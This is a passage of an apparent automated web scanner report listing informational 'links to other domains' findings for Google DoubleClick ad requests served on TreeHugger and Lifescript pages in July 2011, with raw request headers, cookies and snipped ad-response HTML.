<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%253Futm_source%253Doutbrain%2526utm_medium%253Dcpc%2526utm_campaign%253DADHD_Adult%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3DMedicalOptionsHere.org%26adT%3DIdentify%2BADHD%2BSymptoms%26adU%3Dwww.TreatAdultAsthma.com%26adT%3DAsthma%2BSigns%2B%2526amp%253B%2BSymptoms%26adU%3DHealth.JustAnswer.com/Psychiatry%26adT%3DAsk%2Ba%2BPsychiatrist%2BOnline%26adU%3DDisabilityGroup.com%26adT%3DAdult%2BAdhd%2BBenefits%26adU%3Dwww.Allsup.com%26adT%3DBipolar%2BDisability%26gl%3DUS&usg=AFQjCNEaGheP4U0w0vkNFeI1fBTbjL7HmQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.70. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445165&channel=TreeHugger_Left_Tower&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&dt=1311427152730&bpp=3&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s&correlator=1311427153558&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=891508824&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&fu=0&ifi=2&dtd=M&xpc=nwfSw8CbP6&p=http%3A//www.treehugger.com

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3DVerengoSolar.com/Free_Quote%26adT%3DSolar%2BPower%2B(Pay%2BNo%2B%2524)%26adU%3DAffordableSolarLease.com%26adT%3DCost%2Bof%2BSolar%2BPanels%26adU%3Dwww.CoalInYourLife.org%26adT%3DYour%2BHealth%2BIs%2BImportant%26adU%3DRoyalCaribbeanVoyages.com%26adT%3DRoyal%2BCarribean%2BCruises%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHbYFGAN6Dp3HYL7n8Pq4OAQnvuQg

Request

GET /pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445165&channel=TreeHugger_Left_Tower&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&dt=1311427152730&bpp=3&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s&correlator=1311427153558&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=891508824&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&fu=0&ifi=2&dtd=M&xpc=nwfSw8CbP6&p=http%3A//www.treehugger.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 23 Jul 2011 13:19:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 9230
X-XSS-Protection: 1; mode=block

<html><head><style><!--
.ch{cursor:pointer;}a.search:link { color: #000000 }a.search:visited { color: #000000 }a.search:hover { color: #000000 }a.search:active { color: #000000 }body { background-colo
...[SNIP]...
<td width="118" height="13" valign="middle" style="border-bottom: "><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3DVerengoSolar.com/Free_Quote%26adT%3DSolar%2BPower%2B(Pay%2BNo%2B%2524)%26adU%3DAffordableSolarLease.com%26adT%3DCost%2Bof%2BSolar%2BPanels%26adU%3Dwww.CoalInYourLife.org%26adT%3DYour%2BHealth%2BIs%2BImportant%26adU%3DRoyalCaribbeanVoyages.com%26adT%3DRoyal%2BCarribean%2BCruises%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHbYFGAN6Dp3HYL7n8Pq4OAQnvuQg" target="_blank"><script>
...[SNIP]...

18.71. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445205&channel=TreeHugger_Domain&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&dt=1311427191274&bpp=3&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s&correlator=1311427191500&pv_ch=TreeHugger_Domain%2B&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=1532740988&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&fu=0&ifi=2&dtd=M&xpc=BPCGhsMTdu&p=http%3A//www.treehugger.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/travel_nature/%253Fcampaign%253Dth_nav_travel%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3DSunRunHome.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNF4q4yldI6crcmWATPBycXa57bB1w

Request

GET /pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445205&channel=TreeHugger_Domain&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&dt=1311427191274&bpp=3&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s&correlator=1311427191500&pv_ch=TreeHugger_Domain%2B&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=1532740988&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&fu=0&ifi=2&dtd=M&xpc=BPCGhsMTdu&p=http%3A//www.treehugger.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 23 Jul 2011 13:20:02 GMT
Server: cafe
Cache-Control: private
Content-Length: 4804
X-XSS-Protection: 1; mode=block

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/travel_nature/%253Fcampaign%253Dth_nav_travel%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3DSunRunHome.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNF4q4yldI6crcmWATPBycXa57bB1w" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js"></script>
...[SNIP]...

18.72. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445207&channel=TreeHugger_Left_Text&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&dt=1311427191303&bpp=2&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s%2C120x600_as&correlator=1311427191500&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=1532740988&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&fu=0&ifi=3&dtd=M&xpc=Xf55Gm2yz2&p=http%3A//www.treehugger.com

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/travel_nature/%253Fcampaign%253Dth_nav_travel%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3Dwww.SolarCity.com/SolarPanelsQuote%26adT%3DAffordable%2BSolar%2BPanels%26adU%3Dwww.2seewhales.com%26adT%3DDaily%2BWhale%2BWatching%26adU%3DEnergyPlace.com%26adT%3DGovernment%2BSolar%2BPanels%26adU%3Dschneider-electric.com%26adT%3DSolar%2BEnergy%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNGzZU0YCzN0FlbBD9E5TCDyoy9OBg

Request

GET /pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445207&channel=TreeHugger_Left_Text&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&dt=1311427191303&bpp=2&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s%2C120x600_as&correlator=1311427191500&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=1532740988&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&fu=0&ifi=3&dtd=M&xpc=Xf55Gm2yz2&p=http%3A//www.treehugger.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 23 Jul 2011 13:20:02 GMT
Server: cafe
Cache-Control: private
Content-Length: 8717
X-XSS-Protection: 1; mode=block

<html><head><style><!--
.ch{cursor:pointer;}a.search:link { color: #000000 }a.search:visited { color: #000000 }a.search:hover { color: #000000 }a.search:active { color: #000000 }body { background-colo
...[SNIP]...
<td width="118" height="13" valign="middle" style="border-bottom: "><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/travel_nature/%253Fcampaign%253Dth_nav_travel%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3Dwww.SolarCity.com/SolarPanelsQuote%26adT%3DAffordable%2BSolar%2BPanels%26adU%3Dwww.2seewhales.com%26adT%3DDaily%2BWhale%2BWatching%26adU%3DEnergyPlace.com%26adT%3DGovernment%2BSolar%2BPanels%26adU%3Dschneider-electric.com%26adT%3DSolar%2BEnergy%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNGzZU0YCzN0FlbBD9E5TCDyoy9OBg" target="_blank"><script>
...[SNIP]...

18.73. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FDoctor-Recommended_Tips_for_Women_with_ADHD.aspx&dt=1311276209255&bpp=27&shv=r20110713&jsv=r20110719&correlator=1311276209804&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=1808472509&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=733&ifk=1887371661&fu=4&ifi=1&dtd=1462

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3Dwww.focusonadhd.com%26adT%3DADHD%26adU%3Dhealthynow.com%26adT%3DBi%2BPolar%2BTest%26adU%3Dwww.health.com%26adT%3DADHD%2BDiet%2BFor%2BAdults%26adU%3DSynaptol.com/Adult-ADHD%26adT%3DAdult%2BADHD%2BSymptom%2BRelief%26adU%3DHaveTheRelationshipYouWant.com%26adT%3DMake%2BHim%2BAddicted%2BTo%2BYou%26gl%3DUS&usg=AFQjCNEjbfFg0Xdpg9Jwj0JrInaHzVMo7Q

Request

GET /pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FDoctor-Recommended_Tips_for_Women_with_ADHD.aspx&dt=1311276209255&bpp=27&shv=r20110713&jsv=r20110719&correlator=1311276209804&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=1808472509&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=733&ifk=1887371661&fu=4&ifi=1&dtd=1462 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=1;tile=2;sz=160x600;ord=109374225633552
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Jul 2011 19:25:04 GMT
Server: cafe
Cache-Control: private
Content-Length: 14386
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#6699cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3Dwww.focusonadhd.com%26adT%3DADHD%26adU%3Dhealthynow.com%26adT%3DBi%2BPolar%2BTest%26adU%3Dwww.health.com%26adT%3DADHD%2BDiet%2BFor%2BAdults%26adU%3DSynaptol.com/Adult-ADHD%26adT%3DAdult%2BADHD%2BSymptom%2BRelief%26adU%3DHaveTheRelationshipYouWant.com%26adT%3DMake%2BHim%2BAddicted%2BTo%2BYou%26gl%3DUS&usg=AFQjCNEjbfFg0Xdpg9Jwj0JrInaHzVMo7Q" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.74. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311446614&channel=TreeHugger_Left_Text&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Fscience_technology%2F%3Fcampaign%3Dth_nav_scitech&dt=1311428613269&bpp=3&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s%2C120x600_as&correlator=1311428613403&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=521257110&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&fu=0&ifi=3&dtd=768&xpc=wRcqBRfMiL&p=http%3A//www.treehugger.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/science_technology/%253Fcampaign%253Dth_nav_scitech%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3Dwww.solarcity.com/FreeSolarQuote%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHsXBJPO50EfwuWrzvYrCdnCfhScQ

Request

GET /pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311446614&channel=TreeHugger_Left_Text&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Fscience_technology%2F%3Fcampaign%3Dth_nav_scitech&dt=1311428613269&bpp=3&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s%2C120x600_as&correlator=1311428613403&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=521257110&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&fu=0&ifi=3&dtd=768&xpc=wRcqBRfMiL&p=http%3A//www.treehugger.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: cafe
Cache-Control: private
Content-Length: 3213
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/science_technology/%253Fcampaign%253Dth_nav_scitech%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3Dwww.solarcity.com/FreeSolarQuote%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHsXBJPO50EfwuWrzvYrCdnCfhScQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js"></script>
...[SNIP]...

18.75. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311446613&channel=TreeHugger_Domain&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Fscience_technology%2F%3Fcampaign%3Dth_nav_scitech&dt=1311428613242&bpp=2&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s&correlator=1311428613403&pv_ch=TreeHugger_Domain%2B&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=521257110&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&fu=0&ifi=2&dtd=784&xpc=sm8TDhnWhF&p=http%3A//www.treehugger.com

The response contains the following links to other domains:

http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
